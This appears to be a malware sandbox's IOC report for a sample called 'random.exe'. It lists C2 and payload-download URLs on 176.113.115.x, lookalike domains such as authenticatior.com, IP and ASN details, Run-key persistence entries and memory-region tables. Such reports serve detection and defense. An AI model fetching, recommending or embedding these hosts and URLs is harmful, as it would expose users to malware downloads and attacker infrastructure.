http://tempuri.org/Endpoint/CheckConnectResponse

unknown

http://schemas.datacontract.org/2004/07/

unknown

http://www.apache.org/licenses/LICENSE-2.0.html

unknown

https://go.micro

unknown

http://176.113.115.7/files/527224533/ReK7Ewx.exei

unknown

http://176.113.115.6/Ni9kiput/index.phpH

unknown

https://api.ip.sb/geoip%USERPEnvironmentROFILE%

unknown

http://176.113.115.6/Ni9kiput/index.phpF

unknown

http://176.113.115.7/files/6142491850/FvbuInU.exe

unknown

https://contoso.com/Icon

unknown

https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=

unknown

http://www.autoitscript.com/autoit3/X

unknown

http://nsis.sf.net/NSIS_ErrorError

unknown

http://101.99.92.190:4449t-

unknown

https://github.com/Pester/Pester

unknown

http://schemas.xmlsoap.org/ws/2004/08/addressing

unknown

http://crl.micro

unknown

http://verifycleansecurity.com/static/Qbffmsv.exe

unknown

http://schemas.xmlsoap.org/wsdl/

unknown

https://authenticatior.com/Client32.iniC:

unknown

http://tempuri.org/Endpoint/EnvironmentSettingsResponse

unknown

http://176.113.115.6/Ni9kiput/index.php

unknown

http://176.113.115.7/files/5526411762/yUI6F6C.exe1dac97d7aee7l

unknown

http://176.113.115.7/files/7868598855/zY9sqWs.exea

unknown

https://gemini.google.com/app?q=

unknown

http://176.113.115.7/files/7868598855/zY9sqWs.exe

unknown

http://176.113.115.7/test/am_no.bat$

unknown

http://176.113.115.6/Ni9kiput/index.phpx

unknown

http://176.113.115.6/Ni9kiput/index.phpv

unknown

http://176.113.115.7/files/7868598855/zY9sqWs.exe.exe

unknown

http://176.113.115.7/files/6291786446/EDM8nAR.batshqos.dll

unknown

http://176.113.115.6/Ni9kiput/index.phpu8

unknown

http://176.113.115.7/files/7834629666/v6Oqdnc.exe;

unknown

http://tempuri.org/Endpoint/EnvironmentSettings

unknown

https://contoso.com/License

unknown

http://schemas.xmlsoap.org/soap/envelope/

unknown

http://176.113.115.7/files/7868598855/zY9sqWs.e

unknown

https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=

unknown

http://tempuri.org/Endpoint/VerifyUpdateResponse

unknown

http://176.113.115.6/Ni9kiput/index.php~8

unknown

http://176.113.115.7/files/5526411762/yUI6F6C.exe

unknown

https://www.google.com/images/branding/product/ico/googleg_alldp.ico

unknown

https://authenticatior.com/Client32.iniLMEMP

unknown

http://176.113.115.6/:

unknown

https://api.ipify.orgcookies//settinString.Removeg

unknown

http://176.113.115.7/files/7098980627/mAtJWNv.exes

unknown

https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search

unknown

https://contoso.com/

unknown

http://176.113.115.6/3

unknown

http://176.113.115.6/Ni9kiput/index.php4

unknown

http://tempuri.org/0

unknown

http://176.113.115.7/files/7212159662/HmngBpR.exe

unknown

http://tempuri.org/Endpoint/SetEnvironmentvi

unknown

https://authenticatior.com/vrep.msiLMEMHh

unknown

http://101.99.92.190:40919

unknown

http://176.113.115.7/files/7098980627/mAtJWNv.exee

unknown

There are 90 hidden URLs, click here to show them.

IPs

Domain

Country

Malicious

101.99.92.190

unknown

Malaysia

Details

IP:	101.99.92.190
TargetID:	19
Current Path:	C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe
Country:	Malaysia
Countrycode:	MYS
ASN number:	45839
ASN name:	SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Found malware configuration	AV Detection
C2 URLs / IPs found in malware configuration	Networking	Application Layer Protocol
URLs found in memory or binary data	Networking

176.113.115.6

unknown

Russian Federation

Details

IP:	176.113.115.6
TargetID:	11
Current Path:	C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Country:	Russian Federation
Countrycode:	RUS
ASN number:	49505
ASN name:	SELECTELRU
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Found malware configuration	AV Detection
C2 URLs / IPs found in malware configuration	Networking	Application Layer Protocol
Sample uses string decryption to hide its real strings	AV Detection
URLs found in memory or binary data	Networking

13.92.180.205

unknown

United States

176.113.115.7

unknown

Russian Federation

Details

IP:	176.113.115.7
TargetID:	11
Current Path:	C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Country:	Russian Federation
Countrycode:	RUS
ASN number:	49505
ASN name:	SELECTELRU
Private:	false

Signature Hits	Behavior Group	Mitre Attack
URLs found in memory or binary data	Networking

104.26.13.31

unknown

United States

185.170.144.38

unknown

Registry

Path

Value

Malicious

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

61c1a86413.exe

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

afdbfd8fdc.exe

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

7fd483a527.exe

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

26335e66aa.exe

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

b794b2f69e.exe

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

am_no.cmd

HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache

LangID

HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache

C:\Windows\System32\cmd.exe.FriendlyAppName

HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache

C:\Windows\System32\cmd.exe.ApplicationCompany

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PfOHmro_RASAPI32

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PfOHmro_RASAPI32

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PfOHmro_RASAPI32

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PfOHmro_RASAPI32

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PfOHmro_RASAPI32

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PfOHmro_RASAPI32

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PfOHmro_RASAPI32

FileDirectory

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PfOHmro_RASMANCS

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PfOHmro_RASMANCS

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PfOHmro_RASMANCS

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PfOHmro_RASMANCS

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PfOHmro_RASMANCS

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PfOHmro_RASMANCS

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\PfOHmro_RASMANCS

FileDirectory

\REGISTRY\A\{9e6c2aeb-09c9-f180-a2df-50875dc5cbe6}\Root\InventoryApplicationFile\pfohmro.exe|5c0ac0adaf90e656

ProgramId

\REGISTRY\A\{9e6c2aeb-09c9-f180-a2df-50875dc5cbe6}\Root\InventoryApplicationFile\pfohmro.exe|5c0ac0adaf90e656

FileId

\REGISTRY\A\{9e6c2aeb-09c9-f180-a2df-50875dc5cbe6}\Root\InventoryApplicationFile\pfohmro.exe|5c0ac0adaf90e656

LowerCaseLongPath

\REGISTRY\A\{9e6c2aeb-09c9-f180-a2df-50875dc5cbe6}\Root\InventoryApplicationFile\pfohmro.exe|5c0ac0adaf90e656

LongPathHash

\REGISTRY\A\{9e6c2aeb-09c9-f180-a2df-50875dc5cbe6}\Root\InventoryApplicationFile\pfohmro.exe|5c0ac0adaf90e656

Name

\REGISTRY\A\{9e6c2aeb-09c9-f180-a2df-50875dc5cbe6}\Root\InventoryApplicationFile\pfohmro.exe|5c0ac0adaf90e656

OriginalFileName

\REGISTRY\A\{9e6c2aeb-09c9-f180-a2df-50875dc5cbe6}\Root\InventoryApplicationFile\pfohmro.exe|5c0ac0adaf90e656

Publisher

\REGISTRY\A\{9e6c2aeb-09c9-f180-a2df-50875dc5cbe6}\Root\InventoryApplicationFile\pfohmro.exe|5c0ac0adaf90e656

Version

\REGISTRY\A\{9e6c2aeb-09c9-f180-a2df-50875dc5cbe6}\Root\InventoryApplicationFile\pfohmro.exe|5c0ac0adaf90e656

BinFileVersion

\REGISTRY\A\{9e6c2aeb-09c9-f180-a2df-50875dc5cbe6}\Root\InventoryApplicationFile\pfohmro.exe|5c0ac0adaf90e656

BinaryType

\REGISTRY\A\{9e6c2aeb-09c9-f180-a2df-50875dc5cbe6}\Root\InventoryApplicationFile\pfohmro.exe|5c0ac0adaf90e656

ProductName

\REGISTRY\A\{9e6c2aeb-09c9-f180-a2df-50875dc5cbe6}\Root\InventoryApplicationFile\pfohmro.exe|5c0ac0adaf90e656

ProductVersion

\REGISTRY\A\{9e6c2aeb-09c9-f180-a2df-50875dc5cbe6}\Root\InventoryApplicationFile\pfohmro.exe|5c0ac0adaf90e656

LinkDate

\REGISTRY\A\{9e6c2aeb-09c9-f180-a2df-50875dc5cbe6}\Root\InventoryApplicationFile\pfohmro.exe|5c0ac0adaf90e656

BinProductVersion

\REGISTRY\A\{9e6c2aeb-09c9-f180-a2df-50875dc5cbe6}\Root\InventoryApplicationFile\pfohmro.exe|5c0ac0adaf90e656

AppxPackageFullName

\REGISTRY\A\{9e6c2aeb-09c9-f180-a2df-50875dc5cbe6}\Root\InventoryApplicationFile\pfohmro.exe|5c0ac0adaf90e656

AppxPackageRelativeId

\REGISTRY\A\{9e6c2aeb-09c9-f180-a2df-50875dc5cbe6}\Root\InventoryApplicationFile\pfohmro.exe|5c0ac0adaf90e656

Size

\REGISTRY\A\{9e6c2aeb-09c9-f180-a2df-50875dc5cbe6}\Root\InventoryApplicationFile\pfohmro.exe|5c0ac0adaf90e656

Language

\REGISTRY\A\{9e6c2aeb-09c9-f180-a2df-50875dc5cbe6}\Root\InventoryApplicationFile\pfohmro.exe|5c0ac0adaf90e656

Usn

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData

ClockTimeSeconds

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData

TickCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe

JScriptSetScriptStateStarted

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\mIrI3a9_RASAPI32

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\mIrI3a9_RASAPI32

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\mIrI3a9_RASAPI32

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\mIrI3a9_RASAPI32

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\mIrI3a9_RASAPI32

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\mIrI3a9_RASAPI32

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\mIrI3a9_RASAPI32

FileDirectory

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\mIrI3a9_RASMANCS

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\mIrI3a9_RASMANCS

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\mIrI3a9_RASMANCS

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\mIrI3a9_RASMANCS

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\mIrI3a9_RASMANCS

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\mIrI3a9_RASMANCS

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\mIrI3a9_RASMANCS

FileDirectory

There are 50 hidden registries, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

E01000

unkown

page execute and read and write

D81000

unkown

page execute and read and write

4DD0000

direct allocation

page read and write

51A0000

direct allocation

page read and write

D81000

unkown

page execute and read and write

5450000

direct allocation

page read and write

4199000

trusted library allocation

page read and write

4CD0000

direct allocation

page read and write

D81000

unkown

page execute and read and write

402000

remote allocation

page execute and read and write

1440000

direct allocation

page read and write

484F000

stack

page read and write

1277000

heap

page read and write

4950000

heap

page read and write

129F000

heap

page read and write

4850000

heap

page read and write

1124000

heap

page read and write

3026000

trusted library allocation

page read and write

AA4000

heap

page read and write

73CC000

heap

page read and write

5340000

direct allocation

page execute and read and write

2A3E000

stack

page read and write

3E25000

trusted library allocation

page read and write

2F7A000

trusted library allocation

page execute and read and write

11D0000

heap

page read and write

2FAB000

heap

page read and write

2F32000

trusted library allocation

page read and write

1384000

heap

page read and write

7E1000

unkown

page execute read

556D000

stack

page read and write

3CDF000

stack

page read and write

4D21000

heap

page read and write

3890000

heap

page read and write

4D21000

heap

page read and write

2F76000

heap

page read and write

722E000

stack

page read and write

6890000

trusted library allocation

page execute and read and write

8FD000

stack

page read and write

1124000

heap

page read and write

4E87000

trusted library allocation

page read and write

1124000

heap

page read and write

8500000

trusted library allocation

page read and write

4D21000

heap

page read and write

6EFD000

stack

page read and write

EAE000

heap

page read and write

1468000

heap

page read and write

36CF000

stack

page read and write

E90000

trusted library allocation

page read and write

66A5000

heap

page read and write

D60000

direct allocation

page read and write

62D000

heap

page read and write

FE0000

trusted library allocation

page execute and read and write

4851000

heap

page read and write

55B6000

trusted library allocation

page read and write

424E000

stack

page read and write

DED000

unkown

page read and write

1263000

heap

page read and write

5DE000

heap

page read and write

1DCF000

stack

page read and write

6FD1000

trusted library allocation

page read and write

15CC000

heap

page read and write

4D21000

heap

page read and write

161F000

heap

page read and write

8AD000

unkown

page write copy

8B5000

unkown

page readonly

70F1000

heap

page read and write

5696000

trusted library allocation

page read and write

4FD0000

heap

page read and write

AA4000

heap

page read and write

E84000

heap

page read and write

37F2000

heap

page read and write

2FFE000

stack

page read and write

FE0000

heap

page read and write

82D8000

heap

page read and write

FFE000

stack

page read and write

3817000

heap

page read and write

2C83000

trusted library allocation

page read and write

6FF9000

trusted library allocation

page read and write

1BE7CCB6000

heap

page read and write

6EBD000

stack

page read and write

1632000

heap

page read and write

4B4A000

trusted library allocation

page read and write

358E000

stack

page read and write

6FB2000

trusted library allocation

page read and write

703C6000

unkown

page readonly

3618000

heap

page read and write

2F4E000

stack

page read and write

2C5F000

stack

page read and write

814F000

trusted library allocation

page read and write

4D21000

heap

page read and write

135E000

heap

page read and write

4E9E000

trusted library allocation

page read and write

3E32000

trusted library allocation

page read and write

13C4000

heap

page read and write

38B2000

heap

page read and write

4FD0000

heap

page read and write

2FE0000

direct allocation

page read and write

4E7F000

stack

page read and write

1880000

heap

page read and write

6780000

trusted library allocation

page read and write

4DD0000

trusted library allocation

page read and write

5320000

direct allocation

page execute and read and write

6D2E000

stack

page read and write

FB1000

unkown

page execute read

DDB000

stack

page read and write

4DDB000

trusted library allocation

page read and write

1275000

heap

page read and write

41DA000

trusted library allocation

page read and write

445E000

stack

page read and write

4E50000

direct allocation

page execute and read and write

694A000

trusted library allocation

page read and write

4740000

heap

page readonly

13F2000

heap

page read and write

40CE000

stack

page read and write

4F30000

direct allocation

page execute and read and write

409F000

stack

page read and write

334E000

stack

page read and write

125F000

unkown

page execute and write copy

4647000

heap

page read and write

361B000

heap

page read and write

4EBF000

trusted library allocation

page read and write

3700000

trusted library allocation

page read and write

144E000

heap

page read and write

4D4F000

stack

page read and write

1170000

trusted library allocation

page read and write

3700000

trusted library allocation

page read and write

3CCF000

stack

page read and write

D60000

direct allocation

page read and write

1124000

heap

page read and write

2BFF000

stack

page read and write

11EF000

heap

page read and write

3700000

trusted library allocation

page read and write

4EA5000

trusted library allocation

page read and write

3000000

heap

page read and write

7D781FE000

stack

page read and write

38BE000

heap

page read and write

4DDB000

trusted library allocation

page read and write

5320000

direct allocation

page execute and read and write

384E000

stack

page read and write

C2E000

stack

page read and write

3C9C000

trusted library allocation

page read and write

138D000

heap

page read and write

93D000

stack

page read and write

6500000

heap

page read and write

D60000

direct allocation

page read and write

4F3F000

trusted library allocation

page read and write

D70000

direct allocation

page read and write

1030000

trusted library allocation

page read and write

3F5F000

stack

page read and write

38B0000

heap

page read and write

125F000

unkown

page execute and write copy

5491000

heap

page read and write

1BE7CCE4000

heap

page read and write

1590000

heap

page read and write

1124000

heap

page read and write

55A0000

direct allocation

page execute and read and write

3C88000

trusted library allocation

page read and write

1073000

unkown

page readonly

2A00000

heap

page read and write

5650000

direct allocation

page execute and read and write

48E1000

trusted library allocation

page read and write

FB2000

trusted library allocation

page read and write

163B000

heap

page read and write

2EDD000

stack

page read and write

38B2000

heap

page read and write

47E000

stack

page read and write

7D786FE000

stack

page read and write

325A000

heap

page read and write

6790000

trusted library allocation

page read and write

4D21000

heap

page read and write

434F000

stack

page read and write

2CD2000

trusted library allocation

page read and write

12C6000

heap

page read and write

56F0000

trusted library allocation

page read and write

168E000

heap

page read and write

52CE000

stack

page read and write

11F3000

heap

page read and write

1432000

heap

page read and write

325E000

stack

page read and write

7720000

trusted library allocation

page read and write

10B1000

unkown

page execute and write copy

7FFC0BDB6000

unkown

page readonly

C29000

heap

page read and write

2AA0000

trusted library allocation

page read and write

3839000

heap

page read and write

712E000

stack

page read and write

2EBE000

stack

page read and write

38B2000

heap

page read and write

2F64000

trusted library allocation

page read and write

4FAF000

trusted library allocation

page read and write

8197000

trusted library allocation

page read and write

3C7E000

trusted library allocation

page read and write

3233000

heap

page read and write

5390000

direct allocation

page execute and read and write

4851000

heap

page read and write

1BE7CCE2000

heap

page read and write

1338000

heap

page read and write

76C0000

trusted library allocation

page read and write

EA6000

heap

page read and write

804E000

stack

page read and write

AA4000

heap

page read and write

11FF000

heap

page read and write

5AF0000

heap

page read and write

5FE000

stack

page read and write

395E000

stack

page read and write

3E37000

trusted library allocation

page read and write

13E0000

direct allocation

page read and write

2C5C000

trusted library allocation

page read and write

4DD8000

trusted library allocation

page read and write

4E93000

trusted library allocation

page read and write

4E77000

trusted library allocation

page read and write

CB3000

heap

page read and write

2E3C000

stack

page read and write

1754000

heap

page read and write

9CF000

stack

page read and write

DE6000

unkown

page execute and read and write

13E0000

direct allocation

page read and write

4DDE000

trusted library allocation

page read and write

63A000

heap

page read and write

AA4000

heap

page read and write

2FFD000

heap

page read and write

131D000

heap

page read and write

D0E000

stack

page read and write

4F80000

direct allocation

page execute and read and write

5610000

direct allocation

page execute and read and write

739E000

stack

page read and write

1015000

trusted library allocation

page execute and read and write

55CE000

trusted library allocation

page read and write

448E000

stack

page read and write

4D21000

heap

page read and write

F90000

trusted library allocation

page read and write

87D000

unkown

page readonly

3242000

heap

page read and write

4D21000

heap

page read and write

5BDF000

stack

page read and write

7650000

trusted library allocation

page read and write

4D21000

heap

page read and write

480F000

stack

page read and write

4EA3000

trusted library allocation

page read and write

670D000

stack

page read and write

3C0E000

stack

page read and write

75FE000

stack

page read and write

55F1000

trusted library allocation

page read and write

1BE7CCCD000

heap

page read and write

4F40000

direct allocation

page execute and read and write

3272000

heap

page read and write

65E3000

heap

page read and write

4E7D000

trusted library allocation

page read and write

5350000

direct allocation

page execute and read and write

4D21000

heap

page read and write

300A000

heap

page read and write

2FE0000

direct allocation

page read and write

1357000

heap

page read and write

5A25000

trusted library allocation

page read and write

45DE000

stack

page read and write

4D21000

heap

page read and write

2FC1000

heap

page read and write

C43000

heap

page read and write

7292000

heap

page read and write

4DD6000

trusted library allocation

page read and write

3700000

trusted library allocation

page read and write

37D0000

heap

page read and write

3257000

heap

page read and write

500B000

stack

page read and write

2C7B000

trusted library allocation

page read and write

1BE7CCCF000

heap

page read and write

912000

unkown

page readonly

1BE7CC91000

heap

page read and write

42A9000

trusted library allocation

page read and write

431E000

stack

page read and write

3000000

direct allocation

page read and write

AA4000

heap

page read and write

83E0000

heap

page read and write

4E50000

direct allocation

page execute and read and write

4851000

heap

page read and write

2B6E000

stack

page read and write

301D000

heap

page read and write

3710000

heap

page read and write

4851000

heap

page read and write

43C000

stack

page read and write

658000

heap

page read and write

7530000

heap

page execute and read and write

D40000

direct allocation

page read and write

465D000

trusted library allocation

page execute and read and write

2DD2000

trusted library allocation

page read and write

D5B000

stack

page read and write

82E4000

heap

page read and write

1385000

heap

page read and write

545F000

stack

page read and write

1125000

heap

page read and write

89AE000

stack

page read and write

703CD000

unkown

page read and write

61A000

heap

page read and write

3FCE000

stack

page read and write

4851000

heap

page read and write

1300000

heap

page read and write

6FDD000

trusted library allocation

page read and write

133B000

heap

page read and write

7D783FF000

stack

page read and write

DCF000

stack

page read and write

40C000

unkown

page read and write

76A0000

trusted library allocation

page read and write

5660000

direct allocation

page execute and read and write

3A4F000

stack

page read and write

822F000

stack

page read and write

56A5000

trusted library allocation

page read and write

2BCE000

stack

page read and write

6CAB000

stack

page read and write

68E000

stack

page read and write

4D3E000

stack

page read and write

4D21000

heap

page read and write

12EA000

heap

page read and write

2A7B000

stack

page read and write

3C78000

trusted library allocation

page read and write

6050000

heap

page read and write

F83000

unkown

page execute and read and write

2FBE000

stack

page read and write

86F0000

trusted library allocation

page read and write

6DFB000

stack

page read and write

BA0000

heap

page read and write

4D21000

heap

page read and write

86CC000

stack

page read and write

3160000

heap

page read and write

3827000

heap

page read and write

4851000

heap

page read and write

7790000

heap

page read and write

40DE000

stack

page read and write

103E000

stack

page read and write

8396000

heap

page read and write

370000

heap

page read and write

A25000

heap

page read and write

4EE0000

heap

page read and write

4860000

heap

page read and write

3000000

direct allocation

page read and write

143D000

heap

page read and write

68A0000

trusted library allocation

page read and write

143E000

stack

page read and write

2D94000

heap

page read and write

4D35000

direct allocation

page read and write

2FE0000

direct allocation

page read and write

4AAD000

trusted library allocation

page read and write

2F53000

trusted library allocation

page execute and read and write

4DD8000

trusted library allocation

page read and write

1BE7CCB6000

heap

page read and write

60F000

stack

page read and write

4E50000

direct allocation

page execute and read and write

23B0000

heap

page read and write

2500000

heap

page read and write

BEF000

stack

page read and write

2FE0000

direct allocation

page read and write

41DF000

stack

page read and write

4D21000

heap

page read and write

4D21000

heap

page read and write

4D21000

heap

page read and write

CBC000

heap

page read and write

9FB000

stack

page read and write

DEC000

unkown

page execute and read and write

2C6F000

trusted library allocation

page read and write

1170000

trusted library allocation

page read and write

531E000

stack

page read and write

474E000

stack

page read and write

67C0000

trusted library allocation

page read and write

239E000

stack

page read and write

11FA000

heap

page read and write

3D24000

trusted library allocation

page read and write

549E000

stack

page read and write

3804000

heap

page read and write

15C5000

heap

page read and write

4851000

heap

page read and write

EBE000

heap

page read and write

124A000

heap

page read and write

4D21000

heap

page read and write

381E000

heap

page read and write

1093000

heap

page read and write

36CF000

stack

page read and write

726F000

stack

page read and write

2DD8000

trusted library allocation

page read and write

4B0000

heap

page read and write

E96000

unkown

page readonly

2BE0000

heap

page read and write

AA4000

heap

page read and write

1BE7CCED000

heap

page read and write

1377000

heap

page read and write

4870000

heap

page execute and read and write

7453000

heap

page read and write

49D1000

trusted library allocation

page read and write

15CE000

heap

page read and write

8363000

heap

page read and write

30C000

stack

page read and write

4851000

heap

page read and write

7B7E000

stack

page read and write

1124000

heap

page read and write

4D21000

heap

page read and write

55A0000

direct allocation

page execute and read and write

2AF6000

heap

page read and write

E74000

heap

page read and write

4EFE000

trusted library allocation

page read and write

4D21000

heap

page read and write

143E000

stack

page read and write

4D21000

heap

page read and write

55A0000

direct allocation

page execute and read and write

5244000

trusted library allocation

page read and write

690000

heap

page read and write

EA0000

trusted library allocation

page read and write

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
random.exe

Files

Processes

URLs

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportrandom.exe

Files

Processes

URLs

IPs

Registry

Memdumps

IOC Report
random.exe